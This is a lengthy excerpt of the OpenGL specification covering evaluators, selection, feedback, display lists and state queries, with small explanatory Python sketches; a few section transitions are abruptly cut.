Figure 5.1 describes map evaluation schematically; an evaluation of enabled maps is effected in one of two ways. The first way is to use the EvalCoord commands. When automatic normal generation (AUTO NORMAL) is enabled, the cross product

    m = (∂q/∂u) × (∂q/∂v)

is computed; the generated analytic normal, n, is given by n = m if a vertex shader is active, or else by n = m / ‖m‖.

The second way to carry out evaluations is to use a set of commands that provide for efficient specification of a series of evenly spaced values to be mapped. This method proceeds in two steps. The first step is to define a grid in the domain, using MapGrid1 for a one-dimensional map or MapGrid2 for a two-dimensional map. In the case of MapGrid1, u′1 and u′2 describe an interval, while n describes the number of partitions of the interval. The error INVALID VALUE results if n ≤ 0. For MapGrid2, (u′1, v′1) specifies one two-dimensional point and (u′2, v′2) specifies another.
nu gives the number of partitions between u′1 and u′2, and nv gives the number of partitions between v′1 and v′2. If either nu ≤ 0 or nv ≤ 0, then the error INVALID VALUE occurs.

Once a grid is defined, an evaluation on a rectangular subset of that grid may be carried out by calling EvalMesh1 or EvalMesh2. For EvalMesh1, mode is either POINT or LINE. The effect is the same as performing the following code fragment, with ∆u′ = (u′2 − u′1)/n:

    Begin(type);
    for i = p1 to p2 step 1.0
        EvalCoord1(i * ∆u′ + u′1);
    End();

For EvalMesh2, mode must be FILL, LINE, or POINT. When mode is POINT, these commands are equivalent to the following, with ∆u′ = (u′2 − u′1)/n and ∆v′ = (v′2 − v′1)/m:

    Begin(POINTS);
    for i = q1 to q2 step 1.0
        for j = p1 to p2 step 1.0
            EvalCoord2(j * ∆u′ + u′1, i * ∆v′ + v′1);
    End();

Again, in all three cases, there is the requirement that 0 ∗ ∆u′ + u′1 = u′1, n ∗ ∆u′ + u′1 = u′2, 0 ∗ ∆v′ + v′1 = v′1, and m ∗ ∆v′ + v′1 = v′2.

An evaluation of a single point on the grid may also be carried out, using EvalPoint1 or EvalPoint2.

5.2 Selection

Selection is used to determine which primitives are drawn into some region of a window. The region is defined by the current model-view and perspective matrices.

Selection works by returning an array of integer-valued names. This array represents the current contents of the name stack. This stack is controlled with the commands

    void InitNames( void );
    void PopName( void );
    void PushName( uint name );
    void LoadName( uint name );

InitNames empties (clears) the name stack. PopName pops one name off the top of the name stack. PushName causes name to be pushed onto the name stack. LoadName replaces the value on the top of the stack with name. Loading a name onto an empty stack generates the error INVALID OPERATION. Popping a name off of an empty stack generates STACK UNDERFLOW; pushing a name onto a full stack generates STACK OVERFLOW. The maximum allowable depth of the name stack is implementation dependent but must be at least 64.
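The grid arithmetic used by MapGrid and EvalMesh can be sketched as follows. This is illustrative Python (not GL API code) showing the i * ∆u′ + u′1 sequence and the endpoint requirement stated above.

```python
def map_grid_points(u1p, u2p, n):
    """Grid values i * du + u1' for i = 0..n, with du = (u2' - u1')/n.
    The spec requires the i = 0 and i = n values to equal u1' and u2'
    exactly (which holds here for binary-friendly endpoints)."""
    du = (u2p - u1p) / n
    return [i * du + u1p for i in range(n + 1)]

if __name__ == "__main__":
    # A 4-partition grid over [0, 1]: five evaluation points.
    print(map_grid_points(0.0, 1.0, 4))
```

EvalMesh1 walks a contiguous sub-range p1..p2 of these indices; EvalMesh2 does the same over a two-dimensional index rectangle.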
In selection mode, framebuffer updates as described in chapter 4 are not performed. The GL is placed in selection mode with RenderMode, using the symbolic constant SELECT. The minimum and maximum window depths of the primitives hit (each of which lies in the range [0, 1]) are each multiplied by 2^32 − 1 and rounded to the nearest unsigned integer to obtain the values that are placed in the hit record. No depth offset arithmetic (section 3.5.5) is performed on these values.

Hit records are placed in the selection array by maintaining a pointer into that array. When selection mode is entered, the pointer is initialized to the beginning of the array. Each time a hit record is copied, the pointer is updated to point at the array element after the one into which the topmost element of the name stack was stored. If copying the hit record into the selection array would cause the total number of values to exceed n, then as much of the record as fits in the array is written and an overflow flag is set.

Selection mode is exited by calling RenderMode with an argument value other than SELECT. When called while in selection mode, RenderMode returns the number of hit records copied into the selection array and resets the SelectBuffer pointer to its last specified value. Values are not guaranteed to be written into the selection array until RenderMode is called. If the selection array overflow flag was set, then RenderMode returns −1 and clears the overflow flag. The name stack is cleared and the stack pointer reset whenever RenderMode is called.

The state required for selection consists of the address of the selection array and its maximum size, the name stack and its associated pointer, a minimum and maximum depth value, and several flags. One flag indicates the current RenderMode value. In the initial state, the GL is in the RENDER mode. Another flag is used to indicate whether or not a hit has occurred since the last name stack manipulation. This flag is reset upon entering selection mode and whenever a name stack manipulation takes place.
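The depth scaling used in hit records can be sketched directly. This is an illustrative Python model, not GL API code:

```python
def hit_record_depth(z):
    """Convert a window depth in [0, 1] to the unsigned integer stored
    in a selection hit record: multiply by 2**32 - 1 and round to the
    nearest unsigned integer."""
    return int(round(z * (2**32 - 1)))

if __name__ == "__main__":
    print(hit_record_depth(0.0), hit_record_depth(1.0))
```

Applications typically divide these integers back by 2^32 − 1 to recover approximate window depths when sorting hits for picking.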
One final flag is required to indicate whether the maximum number of copied names would have been exceeded. This flag is reset upon entering selection mode. This flag, the address of the selection array, and its maximum size are GL client state.

5.3 Feedback

The GL is placed in feedback mode by calling RenderMode with FEEDBACK. When in feedback mode, framebuffer updates as described in chapter 4 are not performed. Instead, information about primitives that would have otherwise been rasterized is returned to the application via the feedback buffer. Feedback is controlled using FeedbackBuffer. The returned feedback buffer has the following grammar:

    feedback-list:
        feedback-item feedback-list
        feedback-item

    feedback-item:
        point
        line-segment
        polygon
        bitmap
        pixel-rectangle
        passthrough

    point:
        POINT TOKEN vertex
    line-segment:
        LINE TOKEN vertex vertex
        LINE RESET TOKEN vertex vertex
    polygon:
        POLYGON TOKEN n polygon-spec
    polygon-spec:
        polygon-spec vertex
        vertex vertex vertex
    bitmap:
        BITMAP TOKEN vertex
    pixel-rectangle:
        DRAW PIXEL TOKEN vertex
        COPY PIXEL TOKEN vertex
    passthrough:
        PASS THROUGH TOKEN f

    vertex (by feedback type):
        2D:                 f f
        3D:                 f f f
        3D COLOR:           f f f color
        3D COLOR TEXTURE:   f f f color tex
        4D COLOR TEXTURE:   f f f f color tex

    color:  f f f f
    tex:    f f f f

state. When such a command is accumulated into the display list (that is, when issued, not when executed), the client state in effect at that time applies to the command. Only server state is affected when the command is executed. As always, pointers which are passed as arguments to commands are dereferenced when the command is issued. (Vertex array pointers are dereferenced when the commands ArrayElement, DrawArrays, DrawElements, or DrawRangeElements are accumulated into a display list.)

A display list is begun by calling NewList. n is a positive integer to which the display list that follows is assigned, and mode is a symbolic constant that controls the behavior of the GL during display list creation. If mode is COMPILE, then commands are not executed as they are placed in the display list.
If mode is COMPILE AND EXECUTE then commands are executed as they are encountered, then placed in the display list. If n = 0, then the error INVALID VALUE is generated.

After calling NewList all subsequent GL commands are placed in the display list (in the order the commands are issued) until a call to EndList occurs, after which the GL returns to its normal command execution state. It is only when EndList occurs that the specified display list is actually associated with the index indicated with NewList. The error INVALID OPERATION is generated if EndList is called without a previous matching NewList, or if NewList is called a second time before calling EndList. The error OUT OF MEMORY is generated if EndList is called and the specified display list cannot be stored because insufficient memory is available. In this case GL implementations of revision 1.1 or greater ensure that no change is made to the previous contents of the display list, if any, and that no other change is made to the GL state, except for the state changed by execution of GL commands when the display list mode is COMPILE AND EXECUTE.

Once defined, a display list is executed by calling CallList. n gives the index of the display list to be called. This causes the commands saved in the display list to be executed, in order, just as if they were issued without using a display list. If n = 0, then the error INVALID VALUE is generated.

The command GenLists returns an integer n such that the indices n, . . . , n + s − 1 are previously unused (i.e. there are s previously unused display list indices starting at n). GenLists also has the effect of creating an empty display list for each of the indices n, . . . , n + s − 1, so that these indices all become used. GenLists returns 0 if there is no group of s contiguous previously unused display list indices, or if s = 0.

Display lists are deleted with DeleteLists, where list is the index of the first display list to be deleted and range is the number of display lists to be deleted.
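The GenLists contract — find s contiguous unused indices, mark them used, return the first, or return 0 — can be modeled with a small allocator. This is a hedged Python sketch of the semantics, not how any GL implementation actually stores list names; the search limit is arbitrary.

```python
def gen_lists(used, s):
    """Sketch of GenLists semantics: find n such that n..n+s-1 are all
    unused, mark them used, and return n; return 0 if s == 0 or no
    contiguous run is found (bounded search for the sketch)."""
    if s == 0:
        return 0
    n = 1                          # display list indices start at 1
    while n + s - 1 <= 2**16:      # arbitrary limit for this illustration
        if all((n + i) not in used for i in range(s)):
            used.update(n + i for i in range(s))
            return n
        n += 1
    return 0

if __name__ == "__main__":
    names = set()
    base = gen_lists(names, 3)     # reserve three contiguous list names
    print(base, sorted(names))
```

A linear scan like this is quadratic in the worst case; a real implementation would track free ranges, but the returned values obey the same contract.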
All information about the display lists is lost, and the indices become unused. Indices to which no display list corresponds are ignored. If range = 0, nothing happens.

Certain commands, when called while compiling a display list, are not compiled into the display list but are executed immediately. These commands fall in several categories, including:

Display lists: GenLists and DeleteLists.

Render modes: FeedbackBuffer, SelectBuffer, and RenderMode.

Vertex arrays: ClientActiveTexture, ColorPointer, EdgeFlagPointer, FogCoordPointer, IndexPointer, InterleavedArrays, NormalPointer, SecondaryColorPointer, TexCoordPointer, VertexAttribPointer, and VertexPointer.

Client state: EnableClientState, DisableClientState, EnableVertexAttribArray, DisableVertexAttribArray, PushClientAttrib, and PopClientAttrib.

Pixels and textures: PixelStore, ReadPixels, GenTextures, DeleteTextures, and AreTexturesResident.

Occlusion queries: GenQueries and DeleteQueries.

Vertex buffer objects: GenBuffers, DeleteBuffers, BindBuffer, BufferData, BufferSubData, MapBuffer, and UnmapBuffer.

Program and shader objects: CreateProgram, CreateShader, DeleteProgram, DeleteShader, AttachShader, DetachShader, BindAttribLocation, CompileShader, ShaderSource, LinkProgram, and ValidateProgram.

GL command stream management: Finish and Flush.

Other queries: All query commands whose names begin with Get and Is (see chapter 6).

GL commands that source data from buffer objects dereference the buffer object data in question at display list compile time, rather than encoding the buffer ID and buffer offset into the display list. Only GL commands that are executed immediately, rather than being compiled into a display list, are permitted to use a buffer object as a data sink.

Flush indicates that all commands that have previously been sent to the GL must complete in finite time. The command Finish forces all previous GL commands to complete.
Finish does not return until all effects from previously issued commands on GL client and server state and the framebuffer are fully realized.

5.6 Hints

Certain aspects of GL behavior, when there is room for variation, may be controlled with hints. A hint is specified using Hint.

Chapter 6. State and State Requests

The state required to describe the GL machine is enumerated in section 6.2. Most state is set through the calls described in previous chapters, and can be queried using the calls described in section 6.1. IsEnabled can be used to determine if value is currently enabled (as with Enable) or disabled.

    GetFloatv(MODELVIEW MATRIX, m);
    m = m^T;

Tables 6.16, 6.19, and 6.34 indicate those state variables which are qualified by ACTIVE TEXTURE or CLIENT ACTIVE TEXTURE during state queries. Queries of texture state variables corresponding to texture coordinate processing units (namely, TexGen state and enables, and matrices) will generate an INVALID OPERATION error if the value of ACTIVE TEXTURE is greater than or equal to MAX TEXTURE COORDS. All other texture state queries will result in an INVALID OPERATION error if the value of ACTIVE TEXTURE is greater than or equal to MAX COMBINED TEXTURE IMAGE UNITS.

GetClipPlane always returns four double-precision values in eqn; these are the coefficients of the plane equation of plane in eye coordinates (these coordinates are those that were computed when the plane was specified).

GetLight places information about value (a symbolic constant) for light (also a symbolic constant) in data. POSITION or SPOT DIRECTION returns values in eye coordinates (again, these are the coordinates that were computed when the position or direction was specified).

GetMaterial, GetTexGen, GetTexEnv, GetTexParameter, and GetBufferParameter are similar to GetLight, placing information about value for the target indicated by their first argument into data.
The face argument to GetMaterial must be either FRONT or BACK, indicating the front or back material, respectively. The env argument to GetTexEnv must be either POINT SPRITE, TEXTURE ENV,

GetTexImage is used to obtain texture images. It is somewhat different from the other get commands; tex is a symbolic value indicating which texture (or texture face in the case of a cube map texture target name) is to be obtained. TEXTURE 1D, TEXTURE 2D, and TEXTURE 3D indicate a one-, two-, or three-dimensional texture respectively, while TEXTURE CUBE MAP POSITIVE X, TEXTURE CUBE MAP NEGATIVE X, TEXTURE CUBE MAP POSITIVE Y, TEXTURE CUBE MAP NEGATIVE Y, TEXTURE CUBE MAP POSITIVE Z, and TEXTURE CUBE MAP NEGATIVE Z indicate the respective face of a cube map texture. lod is a level-of-detail number, format is a pixel format from table 3.6, type is a pixel type from table 3.5.

GetTexImage obtains component groups from a texture image with the indicated level-of-detail. Calling GetTexImage with a color format (one of RED, GREEN, BLUE, ALPHA, RGB, BGR, RGBA, BGRA, LUMINANCE, or LUMINANCE ALPHA) when the base internal format of the texture image is not a color format, or with a format of DEPTH COMPONENT when the base internal format is not a depth format, causes the error INVALID OPERATION. If the base internal format is a color format then the components are assigned among R, G, B, and A according to table 6.1, starting with the first group in the first row, and continuing by obtaining groups in order from each row and proceeding from the first row to the last, and from the first image to the last for three-dimensional textures. If the base internal format is DEPTH COMPONENT, then each depth component is assigned with the same ordering of rows and images. These groups are then packed and placed in client or pixel buffer object memory.
If a pixel pack buffer is bound (as indicated by a non-zero value of PIXEL_PACK_BUFFER_BINDING), img is an offset into the pixel pack buffer; otherwise, img is a pointer to client memory. No pixel transfer operations are performed on this image, but pixel storage modes that are applicable to ReadPixels are applied.

For three-dimensional textures, pixel storage operations are applied as if the image were two-dimensional, except that the additional pixel storage state values PACK_IMAGE_HEIGHT and PACK_SKIP_IMAGES are applied. The correspondence of texels to memory locations is as defined for TexImage3D in section 3.8.1.

The row length, number of rows, image depth, and number of images are determined by the size of the texture image (including any borders). Calling GetTexImage with lod less than zero or larger than the maximum allowable causes the error INVALID_VALUE. Calling GetTexImage with a format of COLOR_INDEX or STENCIL_INDEX causes the error INVALID_ENUM. If a pixel pack buffer object is bound and packing the texture image into the buffer's memory would exceed the size of the buffer, an INVALID_OPERATION error results. If a pixel pack buffer object is bound and img is not evenly divisible by the number of basic machine units needed to store in memory a FLOAT, UNSIGNED_INT, or UNSIGNED_SHORT, respectively, an INVALID_OPERATION error results.

The command

void GetCompressedTexImage( enum target, int lod, void *img );

is used to obtain texture images stored in compressed form. The parameters target, lod, and img are interpreted in the same manner as in GetTexImage. When called, GetCompressedTexImage writes n ubytes of compressed image data to the pixel pack buffer or client memory pointed to by img, where n is the value of TEXTURE_COMPRESSED_IMAGE_SIZE for the texture. The compressed image data is formatted according to the definition of the texture's internal format. All pixel storage and pixel transfer modes are ignored when returning a compressed texture image.
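The two pixel-pack-buffer error conditions above amount to an overflow check and an alignment check. A Python sketch of that logic (the type sizes are illustrative machine-unit counts, not values taken from any particular implementation):

```python
# Sketch of the two INVALID_OPERATION checks for GetTexImage with a bound
# pixel pack buffer. Sizes are illustrative machine-unit counts.
TYPE_SIZE = {"FLOAT": 4, "UNSIGNED_INT": 4, "UNSIGNED_SHORT": 2}

def check_pack(offset, image_bytes, buffer_size, gl_type):
    if offset + image_bytes > buffer_size:
        return "INVALID_OPERATION"   # packing would exceed the buffer's size
    if offset % TYPE_SIZE[gl_type] != 0:
        return "INVALID_OPERATION"   # offset not divisible by the type's size
    return "NO_ERROR"

assert check_pack(0, 64, 64, "FLOAT") == "NO_ERROR"
assert check_pack(8, 64, 64, "FLOAT") == "INVALID_OPERATION"          # overflow
assert check_pack(2, 16, 64, "FLOAT") == "INVALID_OPERATION"          # misaligned
assert check_pack(2, 16, 64, "UNSIGNED_SHORT") == "NO_ERROR"          # 2-byte aligned
```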
Table 6.1: Texture, table, and filter return values. Ri, Gi, Bi, Ai, Li, and Ii are components of the internal format that are assigned to pixel values R, G, B, and A. If a requested pixel value is not present in the internal format, the specified constant value is used.

The command

void GetPolygonStipple( void *pattern );

obtains the polygon stipple. The pattern is packed into pixel pack buffer or client memory according to the procedure given in section 4.3.2 for ReadPixels; it is as if the height and width passed to that command were both equal to 32, the type were BITMAP, and the format were COLOR_INDEX.

For GetColorTable, target must be one of the regular color table names listed in table 3.4. format and type accept the same values as do the corresponding parameters of GetTexImage, except that a format of DEPTH_COMPONENT causes the error INVALID_ENUM. The one-dimensional color table image is returned to pixel pack buffer or client memory starting at table. No pixel transfer operations are performed on this image, but pixel storage modes that are applicable to ReadPixels are performed. Color components that are requested in the specified format, but which are not included in the internal format of the color lookup table, are returned as zero. The assignments of internal color components to the components requested by format are described in table 6.1.

For GetSeparableFilter, target must be SEPARABLE_2D. format and type accept the same values as do the corresponding parameters of GetTexImage. The row and column images are returned to pixel pack buffer or client memory starting at row and column respectively. span is currently unused. Pixel processing and component mapping are identical to those of GetTexImage.

For GetHistogram, target must be HISTOGRAM. type and format accept the same values as do the corresponding parameters of GetTexImage, except that a format of DEPTH_COMPONENT causes the error INVALID_ENUM. The one-dimensional histogram table image is returned to pixel pack buffer or client memory starting at values.
Pixel processing and component mapping are identical to those of GetTexImage, except that instead of applying the Final Conversion pixel storage mode, component values are simply clamped to the range of the target data type. If reset is TRUE, then all counters of all elements of the histogram are reset to zero. Counters are reset whether returned or not. No counters are modified if reset is FALSE.

Calling

void ResetHistogram( enum target );

resets all counters of all elements of the histogram table to zero. target must be HISTOGRAM. It is not an error to reset or query the contents of a histogram table with zero entries.

The functions

void GetHistogramParameter{if}v( enum target, enum pname, T params );

are used for integer and floating point query. target must be HISTOGRAM or PROXY_HISTOGRAM. pname is one of HISTOGRAM_FORMAT, HISTOGRAM_WIDTH, HISTOGRAM_RED_SIZE, HISTOGRAM_GREEN_SIZE, HISTOGRAM_BLUE_SIZE, HISTOGRAM_ALPHA_SIZE, or HISTOGRAM_LUMINANCE_SIZE. pname may be HISTOGRAM_SINK only for target HISTOGRAM. The value of the specified parameter is returned in params.

For GetMinmax, target must be MINMAX. type and format accept the same values as do the corresponding parameters of GetTexImage, except that a format of DEPTH_COMPONENT causes the error INVALID_ENUM. A one-dimensional image of width 2 is returned to pixel pack buffer or client memory starting at values. Pixel processing and component mapping are identical to those of GetTexImage.

If reset is TRUE, then each minimum value is reset to the maximum representable value, and each maximum value is reset to the minimum representable value. All values are reset, whether returned or not. No values are modified if reset is FALSE.

Calling

void ResetMinmax( enum target );

resets all minimum and maximum values of target to their maximum and minimum representable values, respectively. target must be MINMAX.

The functions

void GetMinmaxParameter{if}v( enum target, enum pname, T params );

are used for integer and floating point query. target must be MINMAX. pname is MINMAX_FORMAT or MINMAX_SINK.
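The minmax reset rule (minimum goes to the largest representable value, maximum to the smallest) makes the next recorded group become both extremes. A Python sketch of that semantics, with an illustrative representable range:

```python
# Sketch of minmax-table reset semantics: resetting sets the running minimum
# to the maximum representable value and the running maximum to the minimum,
# so the next group recorded becomes both extremes.
MAX_REP, MIN_REP = 255, 0   # illustrative representable range

class Minmax:
    def __init__(self):
        self.reset()
    def reset(self):
        self.min, self.max = MAX_REP, MIN_REP
    def record(self, v):
        self.min = min(self.min, v)
        self.max = max(self.max, v)

mm = Minmax()
for v in (10, 200, 42):
    mm.record(v)
assert (mm.min, mm.max) == (10, 200)
mm.reset()
assert (mm.min, mm.max) == (255, 0)   # extremes swapped, ready for new data
mm.record(77)
assert (mm.min, mm.max) == (77, 77)   # one sample is both min and max
```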
The value of the specified parameter is returned in params.

The version number is either of the form major_number.minor_number or major_number.minor_number.release_number, where the numbers all have one or more digits. The release number and vendor specific information are optional. However, if present, then they pertain to the server and their format and contents are implementation dependent.

GetString returns the version number (returned in the VERSION string) and the extension names (returned in the EXTENSIONS string) that can be supported on the connection. Thus, if the client and server support different versions and/or extensions, a compatible version and list of extensions is returned.

If pname is CURRENT_QUERY, the name of the currently active query for target, or zero if no query is active, will be placed in params.

If pname is QUERY_COUNTER_BITS, the number of bits in the counter for target will be placed in params. The number of query counter bits may be zero, in which case the counter contains no useful information. Otherwise, the minimum number of bits allowed is a function of the implementation's maximum viewport dimensions (MAX_VIEWPORT_DIMS). In this case, the counter must be able to represent at least two overdraws for every pixel in the viewport. The formula to compute the allowable minimum value (where n is the minimum number of bits) is:

    n = min{32, ceil(log2(maxViewportDims[0] × maxViewportDims[1] × 2))}

If id is not the name of a query object, or if the query object named by id is currently active, then an INVALID_OPERATION error is generated.

If pname is QUERY_RESULT, then the query object's result value is placed in params. If the number of query counter bits for target is zero, then the result value is always 0.

There may be an indeterminate delay before the above query returns. If pname is QUERY_RESULT_AVAILABLE, it immediately returns FALSE if such a delay would be required, TRUE otherwise.
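Assuming the formula as reconstructed above (enough bits to count two overdraws per pixel of the largest viewport, capped at 32), the minimum counter width can be computed directly. A Python sketch:

```python
import math

def min_query_counter_bits(max_w, max_h):
    """Smallest allowed non-zero QUERY_COUNTER_BITS for a given maximum
    viewport size, per the formula reconstructed above: enough bits to
    count two overdraws per pixel, capped at 32."""
    return min(32, math.ceil(math.log2(max_w * max_h * 2)))

# 2048*2048 pixels * 2 overdraws = 2^23 samples -> 23 bits suffice.
assert min_query_counter_bits(2048, 2048) == 23
# Very large viewports hit the 32-bit cap.
assert min_query_counter_bits(1 << 17, 1 << 17) == 32
```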
It must always be true that if any query object returns a result available of TRUE, all queries issued prior to that query must also return TRUE.

Querying the state for any given query object forces that occlusion query to complete within a finite amount of time.

If multiple queries are issued on the same target and id prior to calling GetQueryObject[u]iv, the result returned will always be from the last query issued. The results from any queries before the last one will be lost if the results are not retrieved before starting a new query on the same target and id.

IsBuffer returns TRUE if buffer is the name of a buffer object. If buffer is zero, or if buffer is a non-zero value that is not the name of a buffer object, IsBuffer returns FALSE.

The command

boolean IsShader( uint shader );

returns TRUE if shader is the name of a shader object. If shader is zero, or a non-zero value that is not the name of a shader object, IsShader returns FALSE. No error is generated if shader is not a valid shader object name.

The command

void GetShaderiv( uint shader, enum pname, int *params );

returns properties of the shader object named shader in params. The parameter value to return is specified by pname.

If pname is SHADER_TYPE, VERTEX_SHADER is returned if shader is a vertex shader object, and FRAGMENT_SHADER is returned if shader is a fragment shader object. If pname is DELETE_STATUS, TRUE is returned if the shader has been flagged for deletion and FALSE is returned otherwise. If pname is COMPILE_STATUS, TRUE is returned if the shader was last compiled successfully, and FALSE is returned otherwise. If pname is INFO_LOG_LENGTH, the length of the info log, including a null terminator, is returned. If there is no info log, zero is returned. If pname is SHADER_SOURCE_LENGTH, the length of the concatenation of the source strings making up the shader source, including a null terminator, is returned. If no source has been defined, zero is returned.

The command

void GetProgramiv( uint program, enum pname, int *params );

returns properties of the program object named program in params. The parameter value to return is specified by pname.
If pname is DELETE_STATUS, TRUE is returned if the program has been flagged for deletion and FALSE is returned otherwise. If pname is LINK_STATUS, TRUE is returned if the program was last linked successfully, and FALSE is returned otherwise. If pname is VALIDATE_STATUS, TRUE is returned if the last call to ValidateProgram with program was successful, and FALSE is returned otherwise. If pname is INFO_LOG_LENGTH, the length of the info log, including a null terminator, is returned. If there is no info log, 0 is returned. If pname is ATTACHED_SHADERS, the number of objects attached is returned. If pname is ACTIVE_ATTRIBUTES, the number of active attributes in program is returned. If no active attributes exist, 0 is returned. If pname is ACTIVE_ATTRIBUTE_MAX_LENGTH, the length of the longest active attribute name, including a null terminator, is returned. If no active attributes exist, 0 is returned. If pname is ACTIVE_UNIFORMS, the number of active uniforms is returned. If no active uniforms exist, 0 is returned. If pname is ACTIVE_UNIFORM_MAX_LENGTH, the length of the longest active uniform name, including a null terminator, is returned. If no active uniforms exist, 0 is returned.

The command

void GetAttachedShaders( uint program, sizei maxCount, sizei *count, uint *shaders );

returns the names of shader objects attached to program in shaders. The actual number of shader names written into shaders is returned in count. If no shaders are attached, count is set to zero. If count is NULL then it is ignored. The maximum number of shader names that may be written into shaders is specified by maxCount. The number of objects attached to program can be queried by calling GetProgramiv with ATTACHED_SHADERS.

A string that contains information about the last compilation attempt on a shader object or last link or validation attempt on a program object, called the info log, can be obtained with the commands

void GetShaderInfoLog( uint shader, sizei bufSize, sizei *length, char *infoLog );
void GetProgramInfoLog( uint program, sizei bufSize, sizei *length, char *infoLog );

These commands return the info log string in infoLog. This string will be null terminated.
The actual number of characters written into infoLog, excluding the null terminator, is returned in length. If length is NULL, then no length is returned. The maximum number of characters that may be written into infoLog, including the null terminator, is specified by bufSize. The number of characters in the info log can be queried with GetShaderiv or GetProgramiv with INFO_LOG_LENGTH. If shader is a shader object, the returned info log will either be an empty string or it will contain information about the last compilation attempt for that object. If program is a program object, the returned info log will either be an empty string or it will contain information about the last link attempt or last validation attempt for that object.

The info log is typically only useful during application development and an application should not expect different GL implementations to produce identical info logs.

The command

void GetShaderSource( uint shader, sizei bufSize, sizei *length, char *source );

returns in source the string making up the source code for the shader object shader. The string source will be null terminated. The actual number of characters written into source, excluding the null terminator, is returned in length. If length is NULL, no length is returned. The maximum number of characters that may be written into source, including the null terminator, is specified by bufSize. The string source is a concatenation of the strings passed to the GL using ShaderSource. The length of this concatenation is given by SHADER_SOURCE_LENGTH, which can be queried with GetShaderiv.

The commands

void GetVertexAttrib{dfi}v( uint index, enum pname, T *params );

obtain the vertex attribute state named by pname for the generic vertex attribute numbered index and place the information in the array params. pname must be one of VERTEX_ATTRIB_ARRAY_BUFFER_BINDING, VERTEX_ATTRIB_ARRAY_ENABLED, VERTEX_ATTRIB_ARRAY_SIZE, VERTEX_ATTRIB_ARRAY_STRIDE, VERTEX_ATTRIB_ARRAY_TYPE, VERTEX_ATTRIB_ARRAY_NORMALIZED, or CURRENT_VERTEX_ATTRIB. Note that all the queries except CURRENT_VERTEX_ATTRIB return client state.
The error INVALID_VALUE is generated if index is greater than or equal to MAX_VERTEX_ATTRIBS.

All but CURRENT_VERTEX_ATTRIB return information about generic vertex attribute arrays. The enable state of a generic vertex attribute array is set by the command EnableVertexAttribArray and cleared by DisableVertexAttribArray. The size, stride, type and normalized flag are set by the command VertexAttribPointer. The query CURRENT_VERTEX_ATTRIB returns the current value for the generic attribute index. In this case the error INVALID_OPERATION is generated if index is zero, as there is no current value for generic attribute zero.

The command

void GetVertexAttribPointerv( uint index, enum pname, void **pointer );

obtains the pointer named pname for the vertex attribute numbered index and places the information in the array pointer. pname must be VERTEX_ATTRIB_ARRAY_POINTER. The INVALID_VALUE error is generated if index is greater than or equal to MAX_VERTEX_ATTRIBS.

The commands

void GetUniform{if}v( uint program, int location, T *params );

return the value or values of the uniform at location location for program object program in the array params. The type of the uniform at location determines the number of values returned.

PopAttrib and PopClientAttrib reset the values of those state variables that were saved with the last corresponding PushAttrib or PushClientAttrib. Those not saved remain unchanged. The error STACK_UNDERFLOW is generated if PopAttrib or PopClientAttrib is executed while the respective stack is empty.

Table 6.2 shows the attribute groups with their corresponding symbolic constant names and stacks.

When PushAttrib is called with TEXTURE_BIT set, the priorities, border colors, filter modes, wrap modes, and other state of the currently bound texture objects (see table 6.17), as well as the current texture bindings and enables, are pushed onto the attribute stack. (Unbound texture objects are not pushed or restored.) When an attribute set that includes texture information is popped, the bindings and enables are first restored to their pushed values, then the bound texture object's parameters are restored to their pushed values.
Operations on attribute groups push or pop texture state within that group for all texture units. When state for a group is pushed, all state corresponding to TEXTURE0 is pushed first, followed by state corresponding to TEXTURE1, and so on up to and including the state corresponding to TEXTUREk, where k + 1 is the value of MAX_TEXTURE_UNITS. When state for a group is popped, texture state is restored in the opposite order that it was pushed, starting with state corresponding to TEXTUREk and ending with TEXTURE0. Identical rules are observed for client texture state push and pop operations. Matrix stacks are never pushed or popped with PushAttrib, PushClientAttrib, PopAttrib, or PopClientAttrib.

The depth of each attribute stack is implementation dependent but must be at least 16. The state required for each attribute stack is potentially 16 copies of each state variable, 16 masks indicating which groups of variables are stored in each stack entry, and an attribute stack pointer. In the initial state, both attribute stacks are empty.

In the tables that follow, a type is indicated for each variable. Table 6.3 explains these types. The type actually identifies all state associated with the indicated description; in certain cases only a portion of this state is returned. This is the case with all matrices, where only the top entry on the stack is returned; with clip planes, where only the selected clip plane is returned; with parameters describing lights, where only the value pertaining to the selected light is returned; with textures, where only the selected texture or texture parameter is returned; and with evaluator maps, where only the selected map is returned. Finally, a "–" in the attribute column indicates that the indicated value is not included in any attribute group (and thus can not be pushed or popped with PushAttrib, PushClientAttrib, PopAttrib, or PopClientAttrib).
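The per-unit ordering described above is ordinary stack (LIFO) behavior. A Python sketch, using a hypothetical implementation limit of four texture units:

```python
# Sketch of per-texture-unit attribute push/pop ordering: units are pushed
# TEXTURE0..TEXTUREk and popped (restored) in the reverse order.
MAX_TEXTURE_UNITS = 4   # illustrative value of the implementation limit

stack, push_order, pop_order = [], [], []

def push_attrib(state):
    for unit in range(MAX_TEXTURE_UNITS):       # TEXTURE0 first
        push_order.append(unit)
        stack.append((unit, state[unit]))

def pop_attrib(state):
    for _ in range(MAX_TEXTURE_UNITS):          # TEXTUREk comes off first
        unit, saved = stack.pop()
        pop_order.append(unit)
        state[unit] = saved

state = {u: f"old{u}" for u in range(MAX_TEXTURE_UNITS)}
push_attrib(state)
state = {u: f"new{u}" for u in range(MAX_TEXTURE_UNITS)}  # mutate after push
pop_attrib(state)

assert push_order == [0, 1, 2, 3]
assert pop_order == [3, 2, 1, 0]                    # reverse of push order
assert state == {u: f"old{u}" for u in range(4)}    # pushed values restored
```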
The M and m entries for initial minmax table values represent the maximum and minimum possible representable values, respectively. State variables for which IsEnabled is listed as the query command can also be obtained using GetBooleanv, GetIntegerv, GetFloatv, and GetDoublev. State variables for which any other command is listed as the query command can be obtained only by using that command. State table entries which are required only by the imaging subset (see section 3.6.2) are typeset against a gray background.

6.2 State Tables

Each table row below reads: Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute.

Get value | Type | Get Command | Initial Value | Description | Sec. | Attribute
TEXTURE_COORD_ARRAY | 2*×B | IsEnabled | False | Texture coordinate array enable | 2.8 | vertex-array
TEXTURE_COORD_ARRAY_SIZE | 2*×Z+ | GetIntegerv | 4 | Coordinates per element | 2.8 | vertex-array
TEXTURE_COORD_ARRAY_TYPE | 2*×Z4 | GetIntegerv | FLOAT | Type of texture coordinates | 2.8 | vertex-array
TEXTURE_COORD_ARRAY_STRIDE | 2*×Z+ | GetIntegerv | 0 | Stride between texture coordinates | 2.8 | vertex-array
TEXTURE_COORD_ARRAY_POINTER | 2*×Y | GetPointerv | 0 | Pointer to the texture coordinate array | 2.8 | vertex-array
